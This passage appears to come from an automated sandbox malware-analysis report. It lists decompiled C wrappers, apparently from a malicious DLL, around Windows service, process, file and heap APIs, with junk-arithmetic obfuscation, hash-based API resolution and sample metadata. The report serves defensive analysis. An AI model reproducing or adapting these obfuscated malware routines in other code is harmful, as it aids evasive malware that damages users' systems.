                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,D9D95EA2,00000000,00000000,?), ref: 0022EB2E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: +\%
                                                                                                                      • API String ID: 1514166925-2522068492
                                                                                                                      • Opcode ID: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction ID: 99ae01faec249922cabcbcc00fd16b97ef87075186093eb2a0fc07e48dd95eec
                                                                                                                      • Opcode Fuzzy Hash: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction Fuzzy Hash: 37116736D00208FBDB14DEE6DA4A8DFBFB5EB85310F108099F514A6251E7714B65AF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0022EB36 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 467 22eb36-22ebf1 call 22cf25 call 222d9f OpenSCManagerW
                                                                                                                      C-Code - Quality: 68%
                                                                                                                      			E0022EB36(void* __ecx, intOrPtr _a4, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _v28;
				intOrPtr _v32;
				void* _t40;
				void* _t52;
				signed int _t54;
				signed int _t55;

				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E0022CF25(_t40);
				_v32 = 0xf43dc;
				asm("stosd");
				asm("stosd");
				_t54 = 0x7c;
				asm("stosd");
				_v12 = 0x784be4;
				_t6 =  &_v12; // 0x784be4
				_t55 = 0x36;
				_v12 =  *_t6 / _t54;
				_v12 = _v12 + 0x9f6a;
				_v12 = _v12 * 0x31;
				_v12 = _v12 ^ 0x004694cb;
				_v8 = 0x884396;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x1535ea2d;
				_v8 = _v8 | 0xb4c8309a;
				_v8 = _v8 ^ 0xb7dc5be9;
				_v16 = 0x9578bf;
				_v16 = _v16 / _t55;
				_v16 = _v16 ^ 0x000e2a9d;
				E00222D9F(0xcb6a962, 0x1f4, _t55, 0x1b74c9e2);
				_t52 = OpenSCManagerW(0, 0, _a12); // executed
				return _t52;
			}












                                                                                                                      0x0022eb3e
                                                                                                                      0x0022eb43
                                                                                                                      0x0022eb44
                                                                                                                      0x0022eb47
                                                                                                                      0x0022eb49
                                                                                                                      0x0022eb4e
                                                                                                                      0x0022eb5d
                                                                                                                      0x0022eb62
                                                                                                                      0x0022eb63
                                                                                                                      0x0022eb66
                                                                                                                      0x0022eb67
                                                                                                                      0x0022eb6e
                                                                                                                      0x0022eb73
                                                                                                                      0x0022eb74
                                                                                                                      0x0022eb79
                                                                                                                      0x0022eb94
                                                                                                                      0x0022eb97
                                                                                                                      0x0022eb9e
                                                                                                                      0x0022eba5
                                                                                                                      0x0022eba9
                                                                                                                      0x0022ebb0
                                                                                                                      0x0022ebb7
                                                                                                                      0x0022ebbe
                                                                                                                      0x0022ebca
                                                                                                                      0x0022ebcd
                                                                                                                      0x0022ebdd
                                                                                                                      0x0022ebea
                                                                                                                      0x0022ebf1

                                                                                                                      APIs
                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 0022EBEA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ManagerOpen
                                                                                                                      • String ID: Kx
                                                                                                                      • API String ID: 1889721586-2841836380
                                                                                                                      • Opcode ID: 41dff3092bc1f63532a7cccec9612a866476fb4b2cab239042f705f6c49823a2
                                                                                                                      • Instruction ID: d2bc6eca96b22a849ec2c2cb028eec458d4ea7157737fa95a5e40f60d1d44e21
                                                                                                                      • Opcode Fuzzy Hash: 41dff3092bc1f63532a7cccec9612a866476fb4b2cab239042f705f6c49823a2
                                                                                                                      • Instruction Fuzzy Hash: A1115671D05208FBDB14EFE6D84A9DEBFB5EF44310F208099E504B6250D7B95B14CB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00225D65 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E00225D65(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t31;
				intOrPtr* _t38;
				void* _t39;
				void* _t42;

				_t42 = __edx;
				E0022CF25(_t31);
				_v12 = 0x1c122d;
				_v12 = _v12 * 0x6a;
				_v12 = _v12 ^ 0xecdd50d1;
				_v12 = _v12 ^ 0xe74257e3;
				_v16 = 0xd55139;
				_v16 = _v16 + 0xd07c;
				_v16 = _v16 ^ 0x00d6881e;
				_v8 = 0x156dc9;
				_v8 = _v8 * 0x43;
				_v8 = _v8 ^ 0x03beef10;
				_v8 = _v8 + 0xffffe13f;
				_v8 = _v8 ^ 0x06271f08;
				_t38 = E00222D9F(0x4ef88dcb, 0x31, __ecx, 0xa62ab78c);
				_t39 =  *_t38(_t42, 0, _a12, 0x28, 0x28, __edx, _a4, 0, _a12, _a16, _a20, _a24); // executed
				return _t39;
			}










                                                                                                                      0x00225d6f
                                                                                                                      0x00225d82
                                                                                                                      0x00225d87
                                                                                                                      0x00225d9b
                                                                                                                      0x00225d9e
                                                                                                                      0x00225da5
                                                                                                                      0x00225dac
                                                                                                                      0x00225db3
                                                                                                                      0x00225dba
                                                                                                                      0x00225dc1
                                                                                                                      0x00225dd3
                                                                                                                      0x00225dd6
                                                                                                                      0x00225ddd
                                                                                                                      0x00225de4
                                                                                                                      0x00225df4
                                                                                                                      0x00225e04
                                                                                                                      0x00225e0a

                                                                                                                      APIs
                                                                                                                      • SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028), ref: 00225E04
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileHandleInformation
                                                                                                                      • String ID: WB
                                                                                                                      • API String ID: 3935143524-2158411504
                                                                                                                      • Opcode ID: 43935c843aae4829611c0686b053fedb4fd8e6d3d3521d64be353873fdee31cf
                                                                                                                      • Instruction ID: 17ab7ca66fdad07ce1bc09a6b1854ffdb8e2a7ec0cd74238c3a30275e455ab46
                                                                                                                      • Opcode Fuzzy Hash: 43935c843aae4829611c0686b053fedb4fd8e6d3d3521d64be353873fdee31cf
                                                                                                                      • Instruction Fuzzy Hash: 84111376C01208FBDB10DFA4D946ACEBFB4AB14300F208089F9106A2A4DBB15B64AF81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0023E689 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36serviceCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 477 23e689-23e712 call 22cf25 call 222d9f CloseServiceHandle
                                                                                                                      C-Code - Quality: 73%
                                                                                                                      			E0023E689(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t27;
				int _t34;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022CF25(_t27);
				_v8 = 0x8d6642;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 + 0x9ccb;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x0002819d;
				_v16 = 0x6a74c5;
				_v16 = _v16 | 0x354c93f6;
				_v16 = _v16 ^ 0x356d05ed;
				_v12 = 0xe812c4;
				_v12 = _v12 * 0x26;
				_v12 = _v12 ^ 0x227e2d65;
				E00222D9F(0x23833043, 0x1ec, __ecx, 0x1b74c9e2);
				_t34 = CloseServiceHandle(_a8); // executed
				return _t34;
			}








                                                                                                                      0x0023e68f
                                                                                                                      0x0023e692
                                                                                                                      0x0023e695
                                                                                                                      0x0023e699
                                                                                                                      0x0023e69a
                                                                                                                      0x0023e69f
                                                                                                                      0x0023e6a9
                                                                                                                      0x0023e6ad
                                                                                                                      0x0023e6b4
                                                                                                                      0x0023e6b8
                                                                                                                      0x0023e6bf
                                                                                                                      0x0023e6c6
                                                                                                                      0x0023e6cd
                                                                                                                      0x0023e6d4
                                                                                                                      0x0023e6ef
                                                                                                                      0x0023e6f2
                                                                                                                      0x0023e702
                                                                                                                      0x0023e70d
                                                                                                                      0x0023e712

                                                                                                                      APIs
                                                                                                                      • CloseServiceHandle.ADVAPI32(356D05ED), ref: 0023E70D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleService
                                                                                                                      • String ID: e-~"
                                                                                                                      • API String ID: 1725840886-2046105602
                                                                                                                      • Opcode ID: c1046b7ecd956da74b7a5d1762cebc86866113f0b369af2bd128aca44436a943
                                                                                                                      • Instruction ID: e464ea64a41faabec52af4ddf0617924cf074eb0b2738b959cd14373128df1e7
                                                                                                                      • Opcode Fuzzy Hash: c1046b7ecd956da74b7a5d1762cebc86866113f0b369af2bd128aca44436a943
                                                                                                                      • Instruction Fuzzy Hash: 3901E271C0020CFBCB08EFE4D98689EBFB4EB54304F208189E928A6255D7B5AB649F50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00234DAD Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 52COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 482 234dad-234e63 call 22cf25 call 222d9f CloseHandle
                                                                                                                      C-Code - Quality: 72%
                                                                                                                      			E00234DAD(void* __ecx, void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				void* _v28;
				intOrPtr _v32;
				void* _t41;
				int _t50;
				signed int _t52;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0022CF25(_t41);
				_v32 = 0xb76b6b;
				asm("stosd");
				asm("stosd");
				_t52 = 0x74;
				asm("stosd");
				_v16 = 0xdf8814;
				_v16 = _v16 | 0xf44f2943;
				_v16 = _v16 << 6;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x01b79e59;
				_v12 = 0x5a8921;
				_v12 = _v12 / _t52;
				_v12 = _v12 << 0xd;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 ^ 0x000807b1;
				_v8 = 0x5c56e6;
				_v8 = _v8 ^ 0x7431396c;
				_v8 = _v8 + 0xffff5a5b;
				_v8 = _v8 + 0x50a9;
				_v8 = _v8 ^ 0x74635491;
				E00222D9F(0x25d2a026, 0x1b9, _t52, 0xa62ab78c);
				_t50 = CloseHandle(_a4); // executed
				return _t50;
			}











                                                                                                                      0x00234db4
                                                                                                                      0x00234db7
                                                                                                                      0x00234dba
                                                                                                                      0x00234dbf
                                                                                                                      0x00234dc4
                                                                                                                      0x00234dd3
                                                                                                                      0x00234dd8
                                                                                                                      0x00234dd9
                                                                                                                      0x00234de0
                                                                                                                      0x00234de1
                                                                                                                      0x00234de8
                                                                                                                      0x00234def
                                                                                                                      0x00234df3
                                                                                                                      0x00234df7
                                                                                                                      0x00234dfe
                                                                                                                      0x00234e0f
                                                                                                                      0x00234e12
                                                                                                                      0x00234e16
                                                                                                                      0x00234e1a
                                                                                                                      0x00234e21
                                                                                                                      0x00234e28
                                                                                                                      0x00234e2f
                                                                                                                      0x00234e36
                                                                                                                      0x00234e3d
                                                                                                                      0x00234e52
                                                                                                                      0x00234e5d
                                                                                                                      0x00234e63

                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNEL32(000807B1,?,?,?,?,?,?,?,?,?), ref: 00234E5D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandle
                                                                                                                      • String ID: l91t
                                                                                                                      • API String ID: 2962429428-3929799471
                                                                                                                      • Opcode ID: 8da09b77d3d2241b99642312c43de4b26fc02d46d5695bad48a0b92c4f965d63
                                                                                                                      • Instruction ID: 2ceb6298e023b5a53284244d8ef7d629fbf82d39ebbe56be47d392e2ad440e48
                                                                                                                      • Opcode Fuzzy Hash: 8da09b77d3d2241b99642312c43de4b26fc02d46d5695bad48a0b92c4f965d63
                                                                                                                      • Instruction Fuzzy Hash: D5113476D0060CFFDB05DFE5D84A89EBBB0EB40314F50C088E914A6255D7B99B688F42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0023679C Relevance: 1.6, APIs: 1, Instructions: 65processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 39%
                                                                                                                      			E0023679C(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a36, intOrPtr _a40, intOrPtr _a48, WCHAR* _a60, int _a64) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				intOrPtr _v24;
				void* _t40;
				int _t46;
				WCHAR* _t50;

				_push(_a64);
				_t50 = __ecx;
				_push(_a60);
				_push(0);
				_push(0);
				_push(_a48);
				_push(0);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022CF25(_t40);
				_v24 = 0x639852;
				_v20 = 0;
				_v12 = 0x9647c4;
				_v12 = _v12 + 0x4343;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x0009af77;
				_v16 = 0x17e0ca;
				_v16 = _v16 >> 4;
				_v16 = _v16 ^ 0x000f0fb4;
				_v8 = 0x429f7b;
				_v8 = _v8 + 0xffff27c2;
				_v8 = _v8 + 0xb08b;
				_v8 = _v8 ^ 0x004b6691;
				E00222D9F(0xb8601dc2, 0x1c8, __ecx, 0xa62ab78c);
				_t46 = CreateProcessW(_a60, _t50, 0, 0, _a64, 0, 0, 0, _a36, _a4); // executed
				return _t46;
			}











                                                                                                                      0x002367a4
                                                                                                                      0x002367a9
                                                                                                                      0x002367ab
                                                                                                                      0x002367ae
                                                                                                                      0x002367af
                                                                                                                      0x002367b0
                                                                                                                      0x002367b3
                                                                                                                      0x002367b4
                                                                                                                      0x002367b7
                                                                                                                      0x002367ba
                                                                                                                      0x002367bb
                                                                                                                      0x002367be
                                                                                                                      0x002367c1
                                                                                                                      0x002367c4
                                                                                                                      0x002367c7
                                                                                                                      0x002367c8
                                                                                                                      0x002367cb
                                                                                                                      0x002367cf
                                                                                                                      0x002367d0
                                                                                                                      0x002367d5
                                                                                                                      0x002367df
                                                                                                                      0x002367e2
                                                                                                                      0x002367e9
                                                                                                                      0x002367f0
                                                                                                                      0x002367f4
                                                                                                                      0x002367fb
                                                                                                                      0x00236802
                                                                                                                      0x00236806
                                                                                                                      0x0023680d
                                                                                                                      0x00236814
                                                                                                                      0x0023681b
                                                                                                                      0x00236822
                                                                                                                      0x00236842
                                                                                                                      0x0023685c
                                                                                                                      0x00236863

                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(?,00D9A4AC,00000000,00000000,?,00000000,00000000,00000000,?,0009AF77), ref: 0023685C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction ID: c69c846a55961083beaf1192aa3dd8e695cf218acf14bee35299bd59a44a535a
                                                                                                                      • Opcode Fuzzy Hash: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction Fuzzy Hash: 5621D572900248BBCF119F95CD09CDFBFB9EB99714F008149FA1466120D7B68A64EBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0023E938 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 48%
                                                                                                                      			E0023E938(long __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, long _a36, WCHAR* _a40) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				void* _t34;
				void* _t41;
				long _t45;
				long _t46;

				_push(_a40);
				_t45 = __edx;
				_push(_a36);
				_t46 = __ecx;
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022CF25(_t34);
				_v16 = 0x974c12;
				_v16 = _v16 * 0x75;
				_v16 = _v16 ^ 0x4529a886;
				_v12 = 0x89ee90;
				_v12 = _v12 >> 3;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 ^ 0x0001fd6b;
				_v8 = 0x2afb1;
				_v8 = _v8 + 0xffff660b;
				_v8 = _v8 | 0x1aac0731;
				_v8 = _v8 ^ 0x1aae47e7;
				E00222D9F(0xb361a139, 0x20d, __ecx, 0xa62ab78c);
				_t41 = CreateFileW(_a40, _t45, _a36, 0, _a12, _t46, 0); // executed
				return _t41;
			}










                                                                                                                      0x0023e941
                                                                                                                      0x0023e946
                                                                                                                      0x0023e948
                                                                                                                      0x0023e94b
                                                                                                                      0x0023e94d
                                                                                                                      0x0023e950
                                                                                                                      0x0023e951
                                                                                                                      0x0023e954
                                                                                                                      0x0023e957
                                                                                                                      0x0023e958
                                                                                                                      0x0023e95b
                                                                                                                      0x0023e95e
                                                                                                                      0x0023e961
                                                                                                                      0x0023e962
                                                                                                                      0x0023e963
                                                                                                                      0x0023e968
                                                                                                                      0x0023e97c
                                                                                                                      0x0023e97f
                                                                                                                      0x0023e986
                                                                                                                      0x0023e98d
                                                                                                                      0x0023e991
                                                                                                                      0x0023e995
                                                                                                                      0x0023e99c
                                                                                                                      0x0023e9a3
                                                                                                                      0x0023e9aa
                                                                                                                      0x0023e9b1
                                                                                                                      0x0023e9cb
                                                                                                                      0x0023e9e0
                                                                                                                      0x0023e9e8

                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 0023E9E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 360c415e9015d3d13679f61f4bfb391b888432a2a898910ac906551ddd5173d2
                                                                                                                      • Instruction ID: 4a8fc555aa2c44436eb4666a3a34cc12a26ef029cd1bf577c481fb25beaade5c
                                                                                                                      • Opcode Fuzzy Hash: 360c415e9015d3d13679f61f4bfb391b888432a2a898910ac906551ddd5173d2
                                                                                                                      • Instruction Fuzzy Hash: 9011147690120CBFDF059ED5DC86CDEBFB9EB48354F148198F924A6210D2768A24DF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00227A47 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 71%
                                                                                                                      			E00227A47(long __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _t37;
				void* _t45;
				long _t48;

				_push(_a20);
				_t48 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022CF25(_t37);
				_v20 = _v20 & 0x00000000;
				_v24 = 0xfcacd9;
				_v8 = 0xc1635f;
				_v8 = _v8 >> 7;
				_v8 = _v8 * 0x50;
				_v8 = _v8 * 0x36;
				_v8 = _v8 ^ 0x197e1637;
				_v16 = 0x23fde3;
				_v16 = _v16 << 0xf;
				_v16 = _v16 + 0x8916;
				_v16 = _v16 ^ 0xfef173e1;
				_v12 = 0xdffc87;
				_v12 = _v12 | 0x0f84fa40;
				_v12 = _v12 ^ 0x35513bb9;
				_v12 = _v12 ^ 0x3a8da81e;
				E00222D9F(0x9afcb52f, 0x1c3, __ecx, 0xa62ab78c);
				_t45 = RtlAllocateHeap(_a8, _t48, _a12); // executed
				return _t45;
			}











                                                                                                                      0x00227a4e
                                                                                                                      0x00227a51
                                                                                                                      0x00227a53
                                                                                                                      0x00227a56
                                                                                                                      0x00227a59
                                                                                                                      0x00227a5c
                                                                                                                      0x00227a60
                                                                                                                      0x00227a61
                                                                                                                      0x00227a66
                                                                                                                      0x00227a6d
                                                                                                                      0x00227a74
                                                                                                                      0x00227a7b
                                                                                                                      0x00227a93
                                                                                                                      0x00227a9a
                                                                                                                      0x00227a9d
                                                                                                                      0x00227aa4
                                                                                                                      0x00227aab
                                                                                                                      0x00227aaf
                                                                                                                      0x00227ab6
                                                                                                                      0x00227abd
                                                                                                                      0x00227ac4
                                                                                                                      0x00227acb
                                                                                                                      0x00227ad2
                                                                                                                      0x00227ae2
                                                                                                                      0x00227af1
                                                                                                                      0x00227af7

                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(FEF173E1,00989527,00000000,?,?,?,?,?,?,?,?,?,?,003C356D), ref: 00227AF1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 0f32b3375919fc0ccfdf2406b6b0c1b31f8184e837ed22a30a99afc3922f126c
                                                                                                                      • Instruction ID: a0b235ada7d0e492a1e1e3ee5640c9ec0ea84ef8da4b6ee361d88e79e136eb6d
                                                                                                                      • Opcode Fuzzy Hash: 0f32b3375919fc0ccfdf2406b6b0c1b31f8184e837ed22a30a99afc3922f126c
                                                                                                                      • Instruction Fuzzy Hash: E011E2B2C0121CFBDF05DF94DA4A8EEBBB4EB14304F14C099E9116A251D7B15B24AF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00222E96 Relevance: 1.5, APIs: 1, Instructions: 42serviceCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 67%
                                                                                                                      			E00222E96(void* __ecx, void* __edx, intOrPtr _a4, int _a8, intOrPtr _a12, short* _a16, void* _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				void* _t35;
				void* _t42;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022CF25(_t35);
				_v16 = 0xae7ad3;
				_v16 = _v16 >> 6;
				_v16 = _v16 >> 9;
				_v16 = _v16 ^ 0x000b5401;
				_v12 = 0xf75da6;
				_v12 = _v12 >> 7;
				_v12 = _v12 + 0xa35c;
				_v12 = _v12 ^ 0x00021a7e;
				_v8 = 0xb7fdd7;
				_v8 = _v8 * 0x34;
				_v8 = _v8 >> 7;
				_v8 = _v8 | 0x8cd68937;
				_v8 = _v8 ^ 0x8cd3b3e5;
				E00222D9F(0x53eee54a, 0xc3, __ecx, 0x1b74c9e2);
				_t42 = OpenServiceW(_a20, _a16, _a8); // executed
				return _t42;
			}








                                                                                                                      0x00222e9c
                                                                                                                      0x00222e9f
                                                                                                                      0x00222ea2
                                                                                                                      0x00222ea5
                                                                                                                      0x00222ea8
                                                                                                                      0x00222eac
                                                                                                                      0x00222ead
                                                                                                                      0x00222eb2
                                                                                                                      0x00222ebc
                                                                                                                      0x00222ec0
                                                                                                                      0x00222ec4
                                                                                                                      0x00222ecb
                                                                                                                      0x00222ed2
                                                                                                                      0x00222ed6
                                                                                                                      0x00222edd
                                                                                                                      0x00222ee4
                                                                                                                      0x00222eff
                                                                                                                      0x00222f02
                                                                                                                      0x00222f06
                                                                                                                      0x00222f0d
                                                                                                                      0x00222f1d
                                                                                                                      0x00222f2e
                                                                                                                      0x00222f33

                                                                                                                      APIs
                                                                                                                      • OpenServiceW.ADVAPI32(?,?,000B5401), ref: 00222F2E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: OpenService
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3098006287-0
                                                                                                                      • Opcode ID: 1a010bb4209eebcabefe83886664eafcedc3f71cda4b3a4488a61dc91c7b4f8b
